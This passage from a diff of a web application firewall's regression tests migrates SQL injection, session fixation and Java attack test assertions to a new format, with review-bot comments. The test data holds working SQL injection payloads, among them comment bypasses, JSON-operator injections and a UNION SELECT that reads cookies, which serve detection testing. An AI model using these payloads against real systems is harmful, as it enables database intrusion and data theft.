t%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20an
d%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" version: HTTP/1.0 output: - no_log_contains: id "942522" + log: + no_expect_ids: [942522] - test_id: 9 desc: "Detect admin%40juice-sh.op'and%20likely%20(id)--" stages: @@ -150,4 +158,5 @@ tests: data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" version: HTTP/1.0 output: - log_contains: id "942522" + log: + expect_ids: [942522] 
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml
index 728516d9a..0fc688711 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml
@@ -19,4 +19,5 @@ tests:
 data: "email=admin@juice-sh.op';&password=foo"
 version: HTTP/1.0
 output:
- log_contains: id "942530"
+ log:
+ expect_ids: [942530]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml
index 0fce21551..ad78ed7d5 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml
@@ -19,7 +19,8 @@ tests:
 data: "email=admin%40juice-sh.op';"
 version: HTTP/1.0
 output:
- log_contains: id "942540"
+ log:
+ expect_ids: [942540]
 - test_id: 2
 desc: "Positive test for double quotes"
 stages:
@@ -35,7 +36,8 @@ tests:
 data: "email=admin%40juice-sh.op\";"
 version: HTTP/1.0
 output:
- log_contains: id "942540"
+ log:
+ expect_ids: [942540]
 - test_id: 3
 desc: "Positive test for backticks"
 stages:
@@ -51,7 +53,8 @@ tests:
 data: "email=admin%40juice-sh.op`;"
 version: HTTP/1.0
 output:
- log_contains: id "942540"
+ log:
+ expect_ids: [942540]
 - test_id: 4
 desc: "False positive test CSV balanced single quotes"
 stages:
@@ -67,7 +70,8 @@ tests:
 data: "email='foo';'bar';'def'"
 version: HTTP/1.0
 output:
- no_log_contains: id "942540"
+ log:
+ no_expect_ids: [942540]
 - test_id: 5
 desc: "False positive test balanced backticks"
 stages:
@@ -83,7 +87,8 @@ tests:
 data: "email=`foo`;`bar`;`def`"
 version: HTTP/1.0
 output:
- no_log_contains: id "942540"
+ log:
+ no_expect_ids: [942540]
 - test_id: 6
 desc: "False positive test (markdown) mixed and balanced quotes"
 stages:
@@ -109,7 +114,8 @@ tests:
 ----------397236876--
 version: "HTTP/1.1"
 output:
- no_log_contains: id "942540"
+ log:
+ no_expect_ids: [942540]
 - test_id: 7
 desc: "Test for bypass with comment"
 stages:
@@ -125,4 +131,5 @@ tests:
 data: "email=root%40example.com%27%2F%2A%20comment%20%2A%2F%3B"
 version: HTTP/1.0
 output:
- log_contains: id "942540"
+ log:
+ expect_ids: [942540]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml
index 32b9038b5..f6691e602 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml
@@ -21,7 +21,8 @@ tests:
 data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
 version: HTTP/1.0
 output:
- log_contains: id "942550"
+ log:
+ expect_ids: [942550]
 - test_id: 2
 desc: |
 JSON in SQL (REQUEST_FILENAME)
@@ -38,7 +39,8 @@ tests:
 uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
 version: HTTP/1.0
 output:
- log_contains: id "942550"
+ log:
+ expect_ids: [942550]
 - test_id: 3
 desc: |
 JSON in SQL (ARGS)
@@ -56,7 +58,8 @@ tests:
 data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27"
 version: HTTP/1.0
 output:
- log_contains: id "942550"
+ log:
+ expect_ids: [942550]
 - test_id: 4
 desc: |
 JSON in SQL (REQUEST_FILENAME)
@@ -73,7 +76,8 @@ tests:
 uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27"
 version: HTTP/1.0
 output:
- log_contains: id "942550"
+ log:
+ expect_ids: [942550]
 - test_id: 5
 desc: |
 JSON in SQL (ARGS)
@@ -91,7 +95,8 @@ tests:
 data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
 version: HTTP/1.0
 output:
- log_contains: id "942550"
+ log:
+ expect_ids: [942550]
 - test_id: 6
 desc: |
 JSON in SQL (REQUEST_FILENAME)
@@ -108,7 +113,8 @@ tests:
 uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
 version: HTTP/1.0
 output:
- log_contains: id "942550"
+ log:
+ expect_ids: [942550]
 - test_id: 7
 desc: |
 JSON in SQL (ARGS)
@@ -126,7 +132,8 @@ tests:
 data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27"
 version: HTTP/1.0
 output:
- log_contains: id "942550"
+ log:
+ expect_ids: [942550]
 - test_id: 8
 desc: |
 JSON in SQL (REQUEST_FILENAME)
@@ -143,7 +150,8 @@ tests:
 uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27"
 version: HTTP/1.0
 output:
- log_contains: id "942550"
+ log:
+ expect_ids: [942550]
 - test_id: 9
 desc: |
 JSON in SQL (ARGS)
@@ -161,7 +169,8 @@ tests:
 data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson"
 version: HTTP/1.0
 output:
- log_contains: id "942550"
+ log:
+ expect_ids: [942550]
 - test_id: 10
 desc: |
 JSON in SQL (REQUEST_FILENAME)
@@ -178,7 +187,8 @@ tests:
 uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson"
 version: HTTP/1.0
 output:
- log_contains: id "942550"
+ log:
+ expect_ids: [942550]
 - test_id: 11
 desc: |
 JSON in SQL (ARGS)
@@ -196,7 +206,8 @@ tests:
 data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
 version: HTTP/1.0
 output:
- log_contains: id "942550"
+ log:
+ expect_ids: [942550]
 - test_id: 12
 desc: |
 JSON in SQL (REQUEST_FILENAME)
@@ -213,7 +224,8 @@ tests:
 uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
 version: HTTP/1.0
 output:
- log_contains: id "942550"
+ log:
+ expect_ids: [942550]
 - test_id: 13
 desc: |
 JSON in SQL (ARGS)
@@ -231,7 +243,8 @@ tests:
 data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
 version: HTTP/1.0
 output:
- log_contains: id "942550"
+ log:
+ expect_ids: [942550]
 - test_id: 14
 desc: |
 JSON in SQL (REQUEST_FILENAME)
@@ -248,7 +261,8 @@ tests:
 uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
 version: HTTP/1.0
 output:
- log_contains: id "942550"
+ log:
+ expect_ids: [942550]
 - test_id: 15
 desc: |
 JSON in SQL (ARGS)
@@ -266,7 +280,8 @@ tests:
 data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
 version: HTTP/1.0
 output:
- log_contains: id "942550"
+ log:
+ expect_ids: [942550]
 - test_id: 16
 desc: |
 JSON in SQL (REQUEST_FILENAME)
@@ -283,7 +298,8 @@ tests:
 uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
 version: HTTP/1.0
 output:
- log_contains: id "942550"
+ log:
+ expect_ids: [942550]
 - test_id: 17
 desc: |
 JSON in SQL (ARGS)
@@ -301,7 +317,8 @@ tests:
 data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207"
 version: HTTP/1.0
 output:
- log_contains: id "942550"
+ log:
+ expect_ids: [942550]
 - test_id: 18
 desc: |
 JSON in SQL (REQUEST_FILENAME)
@@ -318,7 +335,8 @@ tests:
 uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207"
 version: HTTP/1.0
 output:
- log_contains: id "942550"
+ log:
+ expect_ids: [942550]
 - test_id: 19
 desc: |
 JSON in SQL (ARGS)
@@ -336,7 +354,8 @@ tests: data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 20 desc: | JSON in SQL (REQUEST_FILENAME) @@ -353,7 +372,8 @@ tests: uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 21 desc: | JSON in SQL (ARGS) @@ -371,7 +391,8 @@ tests: data: "id=OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 22 desc: | JSON in SQL (REQUEST_FILENAME) @@ -388,7 +409,8 @@ tests: uri: "/get/OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 23 desc: | JSON in SQL (ARGS) @@ -406,7 +428,8 @@ tests: data: "id=blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 24 desc: | JSON in SQL (REQUEST_FILENAME) @@ -423,7 +446,8 @@ tests: uri: "/get/blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 25 desc: | JSON in SQL (ARGS) 
@@ -441,7 +465,8 @@ tests: data: "id=OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 26 desc: | JSON in SQL (REQUEST_FILENAME) @@ -458,7 +483,8 @@ tests: uri: "/get/OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 27 desc: | JSON in SQL (ARGS) @@ -476,7 +502,8 @@ tests: data: "id=OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 28 desc: | JSON in SQL (REQUEST_FILENAME) @@ -493,7 +520,8 @@ tests: uri: "/get/OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 29 desc: | JSON in SQL (ARGS) @@ -511,7 +539,8 @@ tests: data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 30 desc: | JSON in SQL (REQUEST_FILENAME) @@ -528,7 +557,8 @@ tests: uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 31 desc: | JSON in SQL (ARGS) @@ -546,7 +576,8 @@ tests: data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 32 desc: | JSON in SQL (REQUEST_FILENAME) @@ -563,7 +594,8 @@ tests: uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 33 desc: | JSON in SQL (ARGS) 
@@ -581,7 +613,8 @@ tests: data: "id=OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 34 desc: | JSON in SQL (REQUEST_FILENAME) @@ -598,7 +631,8 @@ tests: uri: "/get/OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 35 desc: | JSON in SQL (ARGS) @@ -616,7 +650,8 @@ tests: data: "id=OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] - test_id: 36 desc: | JSON in SQL (REQUEST_FILENAME) @@ -633,4 +668,5 @@ tests: uri: "/get/OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" version: HTTP/1.0 output: - log_contains: id "942550" + log: + expect_ids: [942550] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml index 34ab0f5a7..091b97236 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml @@ -19,7 +19,8 @@ tests: data: "email=1.e(ascii+1.e(substring(1.e(select+password+from+users+limit+1+1.e,1+1.e)+1.e,1+1.e,1+1.e)1.e)1.e)+=+70+or'1'='2" version: HTTP/1.0 output: - log_contains: id "942560" + log: + expect_ids: [942560] - test_id: 2 desc: "Status Page Test - simplified positive test for Scientific Notation in MySQL, e.g 1.e(" stages: @@ -35,4 +36,5 @@ tests: data: "foo=1.e(ascii)" version: HTTP/1.0 output: - log_contains: id "942560" + log: + expect_ids: [942560] diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml index 184b98ef0..33658babd 100644 
--- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml +++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml @@ -22,7 +22,8 @@ tests: uri: '/get/foo.php?bar=blah' version: HTTP/1.1 output: - log_contains: id "943100" + log: + expect_ids: [943100] - test_id: 2 desc: "Status Page Test - Possible Session Fixation Attack: Part of Setting Cookie Values in ARG" stages: @@ -42,4 +43,5 @@ tests: uri: "/get/foo.php?test=.cookie;expires=" version: HTTP/1.1 output: - log_contains: id "943100" + log: + expect_ids: [943100] diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml index f0d788032..cbd725d85 100644 --- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml +++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml @@ -23,7 +23,8 @@ tests: uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" version: HTTP/1.1 output: - log_contains: id "943110" + log: + expect_ids: [943110] - test_id: 2 desc: "session fixation attack" stages: @@ -39,7 +40,8 @@ tests: uri: "/get?phpsessid=asdfdasfadsads" version: HTTP/1.0 output: - log_contains: id "943110" + log: + expect_ids: [943110] - test_id: 3 desc: "session fixation attack" stages: @@ -55,7 +57,8 @@ tests: uri: "/get?phpsessid=asdfdasfadsads" version: HTTP/1.0 output: - log_contains: id "943110" + log: + expect_ids: [943110] - test_id: 4 desc: Session Fixation Attack (943110) from old modsec regressions stages: @@ -76,4 +79,5 @@ tests: uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" version: HTTP/1.1 output: - no_log_contains: id "943110" + log: + no_expect_ids: [943110] 
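Review bot: The converted negative assertion in 943110.yaml test 4, `no_expect_ids: [943110]`, is the only expectation left on that stage, so the test also passes when the request never reaches the rule engine at all (a request the server rejects before inspection produces no rule log either). Pairing it with a response-status expectation under the same `output:` block, e.g. `status: 200` (assuming the harness version in use accepts it there), would keep the negative test meaningful. The same `no_expect_ids`-only shape appears in the later hunks of 944000.yaml, 944100.yaml, 944110.yaml and 944120.yaml. This weakness was already present in the `no_log_contains` form, so it is a follow-up rather than a regression introduced by this migration.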
diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml index ca4b42e14..e845e93de 100644 --- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml +++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml @@ -21,4 +21,5 @@ tests: uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" version: HTTP/1.1 output: - log_contains: id "943120" + log: + expect_ids: [943120] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml index 89a8d1154..89a8f7567 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml @@ -1,7 +1,6 @@ --- meta: author: "spartantri, azurit" - description: "Description" rule_id: 944000 tests: - test_id: 1 @@ -22,4 +21,5 @@ tests: uri: "/post" data: "test=value" output: - no_log_contains: "id \"944000\"" + log: + no_expect_ids: [944000] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml index ef283dc65..c1a60d1d6 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml @@ -1,7 +1,6 @@ --- meta: author: "spartantri, azurit" - description: "Description" rule_id: 944100 tests: - test_id: 1 @@ -22,7 +21,8 @@ tests: version: HTTP/1.0 data: "test=java.lang.Runtime" output: - log_contains: "id \"944100\"" + log: + expect_ids: [944100] - test_id: 2 desc: Argument test includes keywords java.lang.ProcessBuilder stages: 
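Review bot: The `meta` block of 944000.yaml loses its `description` key entirely instead of receiving a real value; `description: "Description"` was clearly a placeholder, but after the removal the file's metadata consists only of `author` and `rule_id`, which tells a reader nothing about what the test set exercises. If the test schema still accepts the key, a one-line summary of what the rule's tests probe (the per-test `desc` fields already name the inputs) would serve better than dropping it. The identical removal appears in the first hunk of 944100.yaml on this line and in the first hunk of 944110.yaml further down.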
@@ -41,7 +41,8 @@ tests: version: HTTP/1.0 data: "test=java.lang.ProcessBuilder" output: - log_contains: "id \"944100\"" + log: + expect_ids: [944100] - test_id: 3 desc: Argument name includes keywords java.lang.Runtime stages: @@ -60,7 +61,8 @@ tests: version: HTTP/1.0 data: "java.lang.Runtime=test" output: - log_contains: "id \"944100\"" + log: + expect_ids: [944100] - test_id: 4 desc: Argument name includes keywords java.lang.ProcessBuilder stages: @@ -79,7 +81,8 @@ tests: version: HTTP/1.0 data: "java.lang.ProcessBuilder=test" output: - log_contains: "id \"944100\"" + log: + expect_ids: [944100] - test_id: 5 desc: Cookie test includes keywords java.lang.Runtime stages: @@ -99,7 +102,8 @@ tests: version: HTTP/1.0 data: "test=value" output: - log_contains: "id \"944100\"" + log: + expect_ids: [944100] - test_id: 6 desc: Cookie test includes keywords java.lang.ProcessBuilder stages: @@ -119,7 +123,8 @@ tests: version: HTTP/1.0 data: "test=value" output: - log_contains: "id \"944100\"" + log: + expect_ids: [944100] - test_id: 7 desc: Cookie name includes keywords java.lang.Runtime stages: @@ -139,7 +144,8 @@ tests: version: HTTP/1.0 data: "test=value" output: - log_contains: "id \"944100\"" + log: + expect_ids: [944100] - test_id: 8 desc: Cookie name includes keywords java.lang.ProcessBuilder stages: @@ -159,7 +165,8 @@ tests: version: HTTP/1.0 data: "test=value" output: - log_contains: "id \"944100\"" + log: + expect_ids: [944100] - test_id: 9 desc: Request header test includes keywords java.lang.Runtime stages: @@ -179,7 +186,8 @@ tests: version: HTTP/1.0 data: "test=value" output: - log_contains: "id \"944100\"" + log: + expect_ids: [944100] - test_id: 10 desc: Request header test includes keywords java.lang.ProcessBuilder stages: @@ -199,7 +207,8 @@ tests: version: HTTP/1.0 data: "test=value" output: - log_contains: "id \"944100\"" + log: + expect_ids: [944100] - test_id: 11 desc: XML element includes keywords java.lang.Runtime stages: 
@@ -218,7 +227,8 @@ tests: version: HTTP/1.0 data: "value" output: - no_log_contains: "id \"944100\"" + log: + no_expect_ids: [944100] - test_id: 12 desc: XML attribute name includes keywords java.lang.Runtime stages: @@ -237,7 +247,8 @@ tests: version: HTTP/1.0 data: "element_value" output: - no_log_contains: "id \"944100\"" + log: + no_expect_ids: [944100] - test_id: 13 desc: XML attribute value includes keywords java.lang.Runtime stages: @@ -256,7 +267,8 @@ tests: version: HTTP/1.0 data: "element_value" output: - log_contains: "id \"944100\"" + log: + expect_ids: [944100] - test_id: 14 desc: XML element value includes keywords java.lang.Runtime stages: @@ -275,7 +287,8 @@ tests: version: HTTP/1.0 data: "java.lang.Runtime" output: - log_contains: "id \"944100\"" + log: + expect_ids: [944100] - test_id: 15 desc: XML element includes keywords java.lang.ProcessBuilder stages: @@ -294,7 +307,8 @@ tests: version: HTTP/1.0 data: "value" output: - no_log_contains: "id \"944100\"" + log: + no_expect_ids: [944100] - test_id: 16 desc: XML attribute name includes keywords java.lang.ProcessBuilder stages: @@ -313,7 +327,8 @@ tests: version: HTTP/1.0 data: "element_value" output: - no_log_contains: "id \"944100\"" + log: + no_expect_ids: [944100] - test_id: 17 desc: XML attribute value includes keywords java.lang.ProcessBuilder stages: @@ -332,7 +347,8 @@ tests: version: HTTP/1.0 data: "element_value" output: - log_contains: "id \"944100\"" + log: + expect_ids: [944100] - test_id: 18 desc: XML element value includes keywords java.lang.ProcessBuilder stages: @@ -351,4 +367,5 @@ tests: version: HTTP/1.0 data: "java.lang.ProcessBuilder" output: - log_contains: "id \"944100\"" + log: + expect_ids: [944100] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml index 294ee8250..7cf19d15c 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml 
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml @@ -1,7 +1,6 @@ --- meta: author: "spartantri, azurit" - description: "Description" rule_id: 944110 tests: - test_id: 1 @@ -22,7 +21,8 @@ tests: version: HTTP/1.0 data: "test=java.Runtime" output: - log_contains: "id \"944110\"" + log: + expect_ids: [944110] - test_id: 2 desc: Argument test includes keywords java. and ProcessBuilder stages: @@ -41,7 +41,8 @@ tests: version: HTTP/1.0 data: "test=java.ProcessBuilder" output: - log_contains: "id \"944110\"" + log: + expect_ids: [944110] - test_id: 3 desc: Argument name includes keywords java. and Runtime stages: @@ -60,7 +61,8 @@ tests: version: HTTP/1.0 data: "java.Runtime=test" output: - log_contains: "id \"944110\"" + log: + expect_ids: [944110] - test_id: 4 desc: Argument name includes keywords java. and ProcessBuilder stages: @@ -79,7 +81,8 @@ tests: version: HTTP/1.0 data: "java.ProcessBuilder=test" output: - log_contains: "id \"944110\"" + log: + expect_ids: [944110] - test_id: 5 desc: Cookie test includes keywords java. and Runtime stages: @@ -99,7 +102,8 @@ tests: version: HTTP/1.0 data: "test=value" output: - log_contains: "id \"944110\"" + log: + expect_ids: [944110] - test_id: 6 desc: Cookie test includes keywords java. and ProcessBuilder stages: @@ -119,7 +123,8 @@ tests: version: HTTP/1.0 data: "test=value" output: - log_contains: "id \"944110\"" + log: + expect_ids: [944110] - test_id: 7 desc: Cookie name includes keywords java. and Runtime stages: @@ -139,7 +144,8 @@ tests: version: HTTP/1.0 data: "test=value" output: - log_contains: "id \"944110\"" + log: + expect_ids: [944110] - test_id: 8 desc: Cookie name includes keywords java. and ProcessBuilder stages: @@ -159,7 +165,8 @@ tests: version: HTTP/1.0 data: "test=value" output: - log_contains: "id \"944110\"" + log: + expect_ids: [944110] - test_id: 9 desc: Request header test includes keywords java. and Runtime stages: 
